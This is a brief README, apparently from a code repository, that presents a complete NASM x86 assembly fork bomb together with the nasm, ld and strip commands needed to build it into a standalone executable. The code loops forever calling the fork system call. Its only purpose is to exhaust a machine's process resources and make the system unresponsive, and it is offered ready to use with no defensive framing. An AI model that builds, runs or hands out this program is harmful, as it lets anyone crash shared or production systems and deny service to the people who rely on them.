#NASM Fork Bomb
This creates a very small pure binary fork bomb without external dependencies.
##Build:
Just run the following commands to build a standalone executable:
nasm fork.asm -felf64 -ofork.o
ld fork.o -ofork
strip fork
| global _start | |
| section .text | |
| _start: | |
| mov eax, 2 | |
| int 0x80 | |
| jmp _start |